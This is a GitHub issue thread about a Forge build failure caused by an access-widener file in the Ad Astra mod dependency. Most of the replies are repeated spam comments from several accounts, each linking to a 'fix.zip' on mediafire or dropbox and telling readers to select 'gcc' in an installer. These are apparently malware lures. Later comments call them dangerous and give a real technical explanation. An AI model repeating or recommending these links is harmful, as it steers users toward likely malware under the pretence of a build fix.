### ISSUE TITLE
ad_astra.accesswidener causes my build to fail!

### ISSUE THREAD

**Issue by DRD2k8** [architectury/architectury-loom#234]
So, I was creating an addon for Ad Astra with the Architectury plugin, I went to the forge build.gradle, here's what I got:
```
dependencies {
    forge "net.minecraftforge:forge:${rootProject.forge_version}"

    common(project(path: ":common", configuration: "namedElements")) { transitive false }
    shadowCommon(project(path: ":common", configuration: "transformProductionForge")) { transitive = false }

    modImplementation group: "earth.terrarium.adastra", name: "ad_astra-forge-${minecraft_version}", version: "${ad_astra_version}"
}
```

I got Minecraft version 1.20.1 and Ad Astra version 1.15.5, I was loading the gradle changes and then it said "Failed to setup Minecraft, java.io.IOException: Failed to process jar when running jar processor: fabric-loom:access-widener"! Why is this happening?

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by DRD2k8** [comment]
Sorry, but none of yours helped. The dropbox ones didn't work for some reason, and the mediafire ones were dangerous.

**Comment by DRD2k8** [comment]
I want an actual way to fix this problem, one that's not dangerous.

**Comment by Jab125** [comment]
> Sorry, but none of yours helped. The dropbox ones didn't work for some reason, and the mediafire ones were dangerous.

what @llowvxe and @WSA1k appear to have posted is completely unnecessary, and may be malware!, don't download random executable files from a non-trusted source.

**Comment by Jab125** [comment]
> I want an actual way to fix this problem, one that's not dangerous.

A Forge mod's JAR shouldn't contain an access widener.

If Ad Astra does in fact have an access widener in it's Forge JAR, then it is their problem to fix.

**Comment by DRD2k8** [comment]
Oh, so I guess for my architectury project, it seems to be that only fabric works for that. So I'll get the ad astra from [cursemaven](https://www.cursemaven.com/) for forge versions.

**Comment by DRD2k8** [comment]
I'll still need to know how to exclude the "ad_astra.accesswidener" file from the official ad astra dependency if I want to use it for forge.
